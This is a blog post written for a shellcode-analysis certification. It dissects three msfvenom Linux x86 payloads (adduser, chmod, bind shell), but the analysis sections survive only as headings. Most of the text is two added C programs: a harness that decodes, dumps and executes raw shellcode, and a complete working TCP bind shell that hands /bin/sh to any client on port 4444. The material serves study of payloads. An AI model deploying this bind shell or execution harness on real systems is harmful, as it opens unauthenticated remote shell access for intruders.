
Dissecting Msfvenom Shellcode | Linux x86

Introduction

In this post, we will analyze three samples of Linux x86 shellcode generated by msfvenom, each with a different tool. Before going into the next section, here is the list of what is available to us.

Shellcode I

The first shellcode we will look at is adduser; the following are the options that need to be fed into the payload.

Generating shellcode

Compile and test

Use Ndisasm to dump assembly code

Analyze code line by line using the comments section

Syscall reference: setreuid(), open(), write(), exit()
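The "compile and test" step is the same for all three payloads, so here is one harness for it. This is an added example, not the post's own test program: it takes the `"\x31\xc0..."` text that `msfvenom -f c` prints, turns it into raw bytes, checks them for bad characters, writes a `.bin` that ndisasm or libemu can read, and runs the bytes only when asked to. The embedded sample is a hand-written exit(0) stub, constructed for the example; it is not msfvenom output, and the file name `shellcode.bin` is my choice.

```c
/* Added example (not the post's code): harness for the "compile and test" step.
 * Build 32-bit, because the payloads discussed are Linux x86:
 *   gcc -m32 -O0 -o harness harness.c
 *   ./harness            # decode, check, write shellcode.bin
 *   ./harness --run      # also execute the bytes
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* Constructed sample in the shape msfvenom -f c prints. Hand-written exit(0):
 *   31 c0   xor eax,eax
 *   b0 01   mov al,1       ; __NR_exit
 *   31 db   xor ebx,ebx    ; status 0
 *   cd 80   int 0x80
 */
static const char SAMPLE[] =
    "unsigned char buf[] = \n"
    "\"\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\";\n";

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Pull every \xHH escape out of the pasted text; everything else (quotes,
 * the declaration, newlines, ';') is ignored. Returns the byte count, or 0
 * if an escape is malformed or the output buffer is too small. */
size_t decode_hex_escapes(const char *text, unsigned char *out, size_t cap) {
    size_t n = 0;
    for (const char *p = text; *p; p++) {
        if (*p != '\\') continue;
        if (p[1] != 'x') return 0;             /* only \xHH is expected */
        int hi = hexval(p[2]);
        int lo = hi < 0 ? -1 : hexval(p[3]);   /* never read past a NUL */
        if (hi < 0 || lo < 0 || n >= cap) return 0;
        out[n++] = (unsigned char)(hi << 4 | lo);
        p += 3;
    }
    return n;
}

/* Convenience for regression checks: does the text decode to exactly these bytes? */
int decodes_to(const char *text, const unsigned char *expect, size_t n) {
    unsigned char buf[4096];
    size_t len = decode_hex_escapes(text, buf, sizeof buf);
    return len == n && memcmp(buf, expect, n) == 0;
}

/* Index of the first byte that appears in the bad-character list, or -1. */
long find_bad_char(const unsigned char *buf, size_t len,
                   const unsigned char *bad, size_t nbad) {
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) return (long)i;
    return -1;
}

/* Raw dump for: ndisasm -u shellcode.bin   or   sctest -vvv -S < shellcode.bin */
int write_raw(const char *path, const unsigned char *buf, size_t len) {
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t w = fwrite(buf, 1, len, f);
    return (fclose(f) == 0 && w == len) ? 0 : -1;
}

/* Copy into an RWX mapping and jump to it; no -z execstack needed.
 * Does not return for exit()/execve() payloads. */
int run_shellcode(const unsigned char *buf, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
    memcpy(mem, buf, len);
    ((void (*)(void))mem)();
    return 0;
}

int main(int argc, char **argv) {
    unsigned char buf[4096];
    size_t len = decode_hex_escapes(SAMPLE, buf, sizeof buf);
    if (!len) { fputs("bad escape sequence\n", stderr); return 1; }
    const unsigned char bad[] = { 0x00, 0x0a };   /* the usual suspects */
    printf("length %zu, first bad char at %ld\n", len,
           find_bad_char(buf, len, bad, sizeof bad));
    if (write_raw("shellcode.bin", buf, len) != 0) return 1;
    if (argc > 1 && strcmp(argv[1], "--run") == 0) run_shellcode(buf, len);
    return 0;
}
```

Compile with `-m32`: the same bytes dropped into a 64-bit process are decoded as x86-64 instructions and will not behave as the disassembly suggests. The bad-character check matters for the same reason it does in exploit development: msfvenom only strips bytes you list with `-b`, so verify the output before trusting it.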

Shellcode II

The second shellcode we are going to look at is chmod; the following are the options that need to be fed into the payload.

Generating shellcode using default options

Compile and test

Use GDB with peda to dump assembly code

Analyze code line by line using the comments section

Syscall reference: chmod() and exit()

Shellcode III

The third and last shellcode we are going to dissect is shell_bind_tcp; let's check the payload options first.

Generating shellcode

Compile and test

Use libemu to dump assembly code

Analyze code line by line using the comments section

Syscall reference: socketcall(), dup2(), and execve()
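To check a bind-shell disassembly against something readable, it helps to have the same sequence of calls written in C with the exact values the shellcode has to push. The following is an added example, not the post's code or the Metasploit payload source: it goes socket, bind, listen, accept through the socketcall() multiplexer the way 32-bit code must, then dup2() and execve(). The port is assumed to be 4444 (msfvenom's LPORT default; the post does not state which port was used), and the helper names are mine.

```c
/* Added example (not the post's code): C equivalent of a Linux x86
 * shell_bind_tcp payload, for comparing values against the disassembly.
 * Build:  gcc -m32 -o bindshell bindshell.c   (uses the real socketcall path)
 *         gcc -o bindshell bindshell.c        (64-bit: falls back to libc calls)
 */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/syscall.h>

/* socketcall(2) sub-function numbers (from <linux/net.h>). In the shellcode
 * ebx carries this number and ecx points at the argument array. */
enum { SC_SOCKET = 1, SC_BIND = 2, SC_LISTEN = 4, SC_ACCEPT = 5 };

/* One socket call, multiplexed the way 32-bit x86 does it (eax = __NR_socketcall).
 * On a 64-bit build socketcall does not exist, so map to the direct calls. */
static long sc(int call, long *args) {
#ifdef SYS_socketcall
    return syscall(SYS_socketcall, call, args);
#else
    switch (call) {
    case SC_SOCKET: return socket((int)args[0], (int)args[1], (int)args[2]);
    case SC_BIND:   return bind((int)args[0], (struct sockaddr *)args[1], (socklen_t)args[2]);
    case SC_LISTEN: return listen((int)args[0], (int)args[1]);
    case SC_ACCEPT: return accept((int)args[0], (struct sockaddr *)args[1], (socklen_t *)args[2]);
    default:        return -1;
    }
#endif
}

/* The first dword of the struct sockaddr_in the shellcode builds on the stack,
 * as an x86 CPU reads it: sin_family 2 (AF_INET, bytes 02 00) followed by
 * htons(port). For port 4444 that is the immediate 0x5c110002. */
uint32_t sockaddr_first_dword(uint16_t port) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = INADDR_ANY;   /* 0.0.0.0: listen on every interface */
    unsigned char b[4];
    memcpy(b, &sa, 4);
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* Inverse: recover the listening port from an immediate seen in the disassembly. */
uint16_t port_from_dword(uint32_t dword) {
    return (uint16_t)((((dword >> 16) & 0xff) << 8) | (dword >> 24));
}

/* socket -> bind -> listen -> accept -> dup2 x3 -> execve("/bin/sh"). */
int bind_shell(uint16_t port) {
    long a_socket[3] = { AF_INET, SOCK_STREAM, 0 };
    long s = sc(SC_SOCKET, a_socket);
    if (s < 0) return -1;
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    long a_bind[3] = { s, (long)&sa, sizeof sa };
    if (sc(SC_BIND, a_bind) < 0) return -1;
    long a_listen[2] = { s, 0 };
    if (sc(SC_LISTEN, a_listen) < 0) return -1;
    long a_accept[3] = { s, 0, 0 };              /* NULL addr, NULL addrlen */
    long c = sc(SC_ACCEPT, a_accept);
    if (c < 0) return -1;
    for (int fd = 0; fd < 3; fd++) dup2((int)c, fd);   /* stdin/stdout/stderr -> client */
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return -1;                                    /* only if execve failed */
}

int main(int argc, char **argv) {
    uint16_t port = argc > 1 ? (uint16_t)atoi(argv[1]) : 4444;  /* assumed LPORT */
    printf("sockaddr first dword for port %u: 0x%08x\n", port, sockaddr_first_dword(port));
    return bind_shell(port);
}
```

When reading the disassembly, the immediate pushed just before the bind call is this first dword; `port_from_dword()` turns it back into the port number, which is the quickest way to confirm the LPORT baked into an unknown sample. The accept call passing two NULL pointers is why the shellcode can leave the client address unread.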

Closing Thoughts

Stepping through msfvenom shellcode taught me a few behind-the-scenes tricks; it also cleared up my doubts about how some of the commands work. Hope you learned something too! Feel free to contact me with questions using the comment section below, or just tweet me @ihack4falafel.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID:    SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%2015
